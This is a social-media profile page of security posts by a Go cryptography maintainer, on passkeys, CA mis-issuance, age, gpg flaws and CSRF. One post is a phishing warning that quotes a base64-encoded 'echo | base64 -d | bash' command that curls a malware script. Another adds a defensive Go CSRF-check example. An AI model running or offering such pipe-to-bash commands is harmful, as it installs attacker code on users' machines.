GNU social JP

GNU social JP is a Japanese GNU social server.
Notices by Filippo Valsorda (filippo@abyssdomain.expert)

  1. Filippo Valsorda (filippo@abyssdomain.expert)'s status on Monday, 16-Feb-2026 23:44:10 JST

    I wish that those surveys so often cited by InfoSec pundits that ask

    Do you fully trust AI output?
    Do you always verify AI output?

    also asked

    Do you fully trust your colleagues' output?
    Do you always verify your colleagues' output?

    Just to have comparative numbers, you know.

    In conversation about 10 days ago from abyssdomain.expert
  2. Filippo Valsorda (filippo@abyssdomain.expert)'s status on Thursday, 12-Feb-2026 23:21:55 JST

    The Go Checksum Database guarantees that every Go build on the planet uses the same source for a given module version.

    However, GitHub might not show you that code.

    https://pkg.geomys.org is a simple service to view the canonical source of a Go module, and it comes with Chrome/Firefox extensions to replace pkg.go.dev source links.

    https://words.filippo.io/go-source/?source=Mastodon

    In conversation about 15 days ago from abyssdomain.expert
  3. Filippo Valsorda (filippo@abyssdomain.expert)'s status on Monday, 05-Jan-2026 11:34:26 JST
    in reply to

    Hell yeah, we got the first (of four) hit! So relieved this is working.

    It's the easiest to find case: a double rejection which has probability (2^-16 + 2^-16)² = 2^-30.

    We should see a handful of these before we hit the other two ~2^-31 cases and the (2^-16)² = 2^-32 case.

    In conversation about 2 months ago from abyssdomain.expert

    Attachments
    1. https://cdn.masto.host/abyssdomainexpert/media_attachments/files/115/840/047/902/809/738/original/489e2e0476e9e8fe.png
  4. Filippo Valsorda (filippo@abyssdomain.expert)'s status on Monday, 05-Jan-2026 00:50:10 JST

    Do you have an idle cluster? Can you spare a couple core-years?

    Help me bruteforce some test vectors for RSA key generation edge cases!

    Here are the instructions, it's just a matter of running a single self-contained cross-compilable Go binary that will report the results autonomously.

    https://gist.github.com/FiloSottile/19e7ceb1fdcdaa128f7d3319ad0939fa

    In conversation about 2 months ago from abyssdomain.expert
  5. Filippo Valsorda (filippo@abyssdomain.expert)'s status on Sunday, 28-Dec-2025 02:23:30 JST

    At the https://gpg.fail talk and omg #39c3

    You can just put a \0 in the Hash: header and then newlines and inject text in a cleartext message.

    Won’t even blame PGP here. C is unsafe at any speed.

    gpg has not fixed it yet.

    In conversation about 2 months ago from abyssdomain.expert

    Attachments
    1. https://cdn.masto.host/abyssdomainexpert/media_attachments/files/115/792/484/165/073/814/original/62c310403495b926.jpeg
    2. https://gpg.fail/
  6. Filippo Valsorda (filippo@abyssdomain.expert)'s status on Thursday, 25-Dec-2025 02:56:22 JST

    Really big age release coming tomorrow! 🎅🏻

    - native post-quantum keys
    - built-in recipients for hw plugins
    - age-inspect tool
    - plugin framework
    - batchpass plugin
    - many improved error messages

    https://age-encryption.org

    In conversation about 2 months ago from abyssdomain.expert
  7. Filippo Valsorda (filippo@abyssdomain.expert)'s status on Tuesday, 09-Dec-2025 02:07:35 JST

    When I talk about professionalizing open source maintenance, and about the Geomys Standard of Care, this is what it is about.

    The solution is neither gatekeeping nor blanket legal liability nor making demands of volunteers. The solution is relying on, and funding, professionals.

    https://forum.syncthing.net/t/does-anyone-know-why-syncthing-fork-is-no-longer-available-on-github/25661/165

    In conversation about 3 months ago from abyssdomain.expert

    Attachments
    1. https://cdn.masto.host/abyssdomainexpert/media_attachments/files/115/684/878/371/657/298/original/915f8383cb7f2677.jpeg
  8. Filippo Valsorda (filippo@abyssdomain.expert)'s status on Tuesday, 25-Nov-2025 12:14:27 JST
    • kasperd

    @kasperd I am also more comfortable with hybrids for now, but Bernstein is openly arguing that the NSA is pushing pure PQ as a way to undermine encryption.

    In conversation about 3 months ago from abyssdomain.expert
  9. Filippo Valsorda (filippo@abyssdomain.expert)'s status on Tuesday, 25-Nov-2025 12:14:24 JST
    in reply to
    • kasperd
    • Özgür Kesim

    @oec @kasperd

    The IETF is literally publishing multiple hybrid KEM documents, and is publishing hybrids for TLS with RECOMMENDED=Y while pure ML-KEM is being published RECOMMENDED=N.

    What are you even talking about.

    In conversation about 3 months ago from abyssdomain.expert
  10. Filippo Valsorda (filippo@abyssdomain.expert)'s status on Friday, 24-Oct-2025 01:58:17 JST
    • Wolf480pl
    • ✧✦Catherine✦✧

    @untitaker @wolf480pl @whitequark serious question: how many users do you think ever bulk exported passwords from a password manager, as a proportion of all users that ever used a password?

    IMHO, bulk export is a niche use case, and per-site migration is solved by "add another passkey" or "reset flow".

    In conversation about 4 months ago from abyssdomain.expert
  11. Filippo Valsorda (filippo@abyssdomain.expert)'s status on Thursday, 23-Oct-2025 23:03:09 JST
    in reply to
    • Wolf480pl
    • ✧✦Catherine✦✧

    @wolf480pl @whitequark to this day I do not understand the lock-in argument: just register two passkeys if you're worried! Or do a password/passkey reset if you lose access. These are both not super user friendly options, but neither is exporting passwords from a password manager?

    In conversation about 4 months ago from gnusocial.jp
  12. Filippo Valsorda (filippo@abyssdomain.expert)'s status on Thursday, 23-Oct-2025 21:40:24 JST

    Serious take: the solution to Safe Browsing false positives like the Immich one is passkeys.

    Phishing regularly upends people's lives. The Safe Browsing cat-and-mouse with all its opaque false positives will be necessary until we roll out phishing-resistant auth.

    In conversation about 4 months ago from abyssdomain.expert
  13. Filippo Valsorda (filippo@abyssdomain.expert)'s status on Wednesday, 17-Sep-2025 19:55:41 JST
    in reply to
    • Glyph
    • abadidea
    • Felix :thisisfine: Eckhofer

    @glyph @0xabad1dea @tribut The EU is trying that, right? Does Geomys have strict liability for all of Go? Or does Google? Why would Google let Geomys maintain Go if the liability falls on them? Does a maintainer with a Patreon have strict liability? What about a maintainer who scored their first $10k support contract, which is not enough to pay both taxes and E&O insurance?

    I understand the desire to stick it to the man, but the system needs to be viable, not just desirable.

    In conversation about 5 months ago from abyssdomain.expert
  14. Filippo Valsorda (filippo@abyssdomain.expert)'s status on Thursday, 04-Sep-2025 05:53:17 JST

    There is some chatter about a CA mis-issuing a certificate for 1.1.1.1. https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/SgwC1QsEpvc/m/0V_VMV7uAgAJ

    This CA (https://crt.sh/?caid=201916, only ~300 certs) is only trusted by (1) the Microsoft root program, and (2) the eIDAS QWAC trusted list.

    MS has not been actively managing their root program for years now, and the EU wanted to push theirs on browsers with much better ones.

    In conversation about 6 months ago from abyssdomain.expert

    Attachments
    1. Incident Report: Mis-issued Certificates for SAN iPAddress:1.1.1.1 by Fina RDC 2020
    2. crt.sh | CA:201916 (Free CT Log Certificate Search Tool from Sectigo, formerly Comodo CA)
  15. Filippo Valsorda (filippo@abyssdomain.expert)'s status on Thursday, 14-Aug-2025 01:15:13 JST

    I edited my Cross-Site Request Forgery countermeasures research into a stand-alone article, including recommendations reusable by other projects.

    tl;dr: no need for tokens or keys, modern browsers tell you if a request is cross-origin!

    https://words.filippo.io/csrf?source=Mastodon

    In conversation about 7 months ago from abyssdomain.expert
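    The header check that the post's tl;dr refers to, written out here as an added Go example; it is not code from the post, the linked article, or the Go project. It rejects state-changing requests that a modern browser labels as coming from another site via Sec-Fetch-Site, falls back to comparing the Origin header with the Host for older browsers, and lets through requests that carry neither header (non-browser clients have no ambient cookies to abuse). That ordering, the names IsCrossOrigin, Protect, Transfer, NewRequest and ServeStatus, and the hosts app.example and evil.example are this example's assumptions.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"net/url"
	"strings"
)

// IsCrossOrigin reports whether r is a state-changing request that a browser
// sent from another origin. Order of checks (this example's assumption):
//  1. Safe methods are never blocked.
//  2. A modern browser's Sec-Fetch-Site header is authoritative.
//  3. Otherwise the Origin header is compared with the Host.
//  4. A request with neither header did not come from a browser with
//     ambient credentials (curl, scripts), so it is allowed.
func IsCrossOrigin(r *http.Request) bool {
	switch r.Method {
	case http.MethodGet, http.MethodHead, http.MethodOptions:
		return false
	}
	switch r.Header.Get("Sec-Fetch-Site") {
	case "same-origin", "none":
		// Same origin, or a user-initiated navigation (typed URL, bookmark).
		return false
	case "same-site", "cross-site":
		// A sibling subdomain is still a different origin: reject.
		return true
	}
	origin := r.Header.Get("Origin")
	if origin == "" {
		return false
	}
	u, err := url.Parse(origin)
	if err != nil || u.Host == "" {
		// Unparseable, or the opaque "null" origin that sandboxed frames
		// and some redirects produce: treat as cross-origin.
		return true
	}
	return !strings.EqualFold(u.Host, r.Host)
}

// Protect wraps next and answers 403 to cross-origin state-changing requests.
func Protect(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if IsCrossOrigin(r) {
			http.Error(w, "cross-origin request rejected", http.StatusForbidden)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// Transfer is a constructed sample endpoint (a money transfer) behind the middleware.
func Transfer() http.Handler {
	return Protect(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		fmt.Fprintln(w, "transfer accepted")
	}))
}

// NewRequest builds an in-memory request with the given headers; the target's
// host becomes r.Host, exactly as a real server would see it.
func NewRequest(method, target string, headers map[string]string) *http.Request {
	r := httptest.NewRequest(method, target, nil)
	for k, v := range headers {
		r.Header.Set(k, v)
	}
	return r
}

// ServeStatus runs r through h without a network listener and returns the status code.
func ServeStatus(h http.Handler, r *http.Request) int {
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, r)
	return rec.Code
}

func main() {
	// Constructed sample requests, all POSTs to the protected endpoint.
	samples := map[string]map[string]string{
		"same-origin form post":       {"Sec-Fetch-Site": "same-origin"},
		"cross-site form post":        {"Sec-Fetch-Site": "cross-site"},
		"old browser, foreign Origin": {"Origin": "http://evil.example"},
		"old browser, own Origin":     {"Origin": "http://app.example"},
		"curl, no browser headers":    {},
	}
	for name, hdr := range samples {
		code := ServeStatus(Transfer(), NewRequest("POST", "http://app.example/transfer", hdr))
		fmt.Printf("%-28s -> %d\n", name, code)
	}
}
```

    Note that "same-site" is rejected on purpose: a compromised or attacker-controlled sibling subdomain shares the registrable domain but not the origin, so treating it as trusted would reopen the hole the check is meant to close.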

  16. Filippo Valsorda (filippo@abyssdomain.expert)'s status on Monday, 04-Aug-2025 22:31:10 JST

    Certificate Transparency is meant for browsers and website owners.

    However, I estimate a majority of clients is only interested in discovering domain names, and never checks signatures. I am proposing an additional, optional, less secure, and 20x more efficient API for those clients.

    This should make it possible to run a CT log with less than 1 Gbps.

    https://groups.google.com/a/chromium.org/d/msgid/ct-policy/bcfca3d1-7547-4dc4-b43d-7bf1549f6815%40app.fastmail.com

    In conversation about 7 months ago from abyssdomain.expert
  17. Filippo Valsorda (filippo@abyssdomain.expert)'s status on Monday, 04-Aug-2025 22:08:09 JST

    The small joys of a custom personal site, and of custom Go module paths: I was annoyed that full symbol names like https://filippo.io/sunlight.Client didn't linkify to their docs, so I fixed it!

    https://github.com/FiloSottile/mostly-harmless/commit/c9686a608abdd28ebbf6223ef30ba210388dd2a7

    In conversation about 7 months ago from abyssdomain.expert

    Attachments
    1. sunlight package - filippo.io/sunlight - Go Packages
  18. Filippo Valsorda (filippo@abyssdomain.expert)'s status on Monday, 21-Jul-2025 21:27:18 JST

    I want to set up append-only backups with ZFS, like https://ruderich.org/simon/notes/append-only-backups-with-restic-and-rclone.

    However, this part of zfs-receive.8 makes it sound like a compromised sender could cause snapshots to be deleted on the recipient.

    Does ZFS replication unavoidably trust the sender?

    In conversation about 7 months ago from abyssdomain.expert

    Attachments
    1. https://cdn.masto.host/abyssdomainexpert/media_attachments/files/114/891/016/773/040/191/original/5fb28f873fa4e7ff.png
  19. Filippo Valsorda (filippo@abyssdomain.expert)'s status on Thursday, 17-Jul-2025 21:17:59 JST

    This is pretty well executed phishing.

    The Copy button copies to the clipboard

    echo "Y3Vy[...]ggJg==" | base64 -d | bash

    which in turn curls this script https://gist.github.com/FiloSottile/385137f5ca2eabb51fd206bde2ff1d0a into bash.

    They even detect piping, so to read it you have to run "curl | cat".

    In conversation about 7 months ago from abyssdomain.expert

    Attachments
    1. https://cdn.masto.host/abyssdomainexpert/media_attachments/files/114/868/224/746/439/839/original/67b6eec46293826c.png
    2. Malware served from https://plsp.meshsorterio.com (gist from FiloSottile)
  20. Filippo Valsorda (filippo@abyssdomain.expert)'s status on Thursday, 10-Jul-2025 04:24:20 JST
    in reply to
    • Chris Siebenmann
    • ✧✦Catherine✦✧
    • mei

    @whitequark @cks @mei updated the text not to mention pagers. How to hit 99% is up to the operator, and it doesn’t require 24/7 people.

    In conversation about 8 months ago from abyssdomain.expert

    Filippo Valsorda

    @FiloSottile elsewhere / Cryptogopher / Go crypto maintainer / Professional Open Source maintainer / RC F'13, F2'17
    https://mkcert.dev / https://age-encryption.org / https://filippo.io/newsletter
    🕳️ “Gaze not into the abyss, lest you become recognized as an abyss domain expert, and they expect you keep gazing into the damn thing.” —@nickm

    Statistics: user ID 60766, member since 8 Dec 2022, 73 notices, following 0, followers 0, groups 0.

    GNU social JP is a social network, courtesy of GNU social JP管理人 (the GNU social JP administrator). It runs on GNU social, version 2.0.2-dev, available under the GNU Affero General Public License.

    All GNU social JP content and data are available under the Creative Commons Attribution 3.0 license.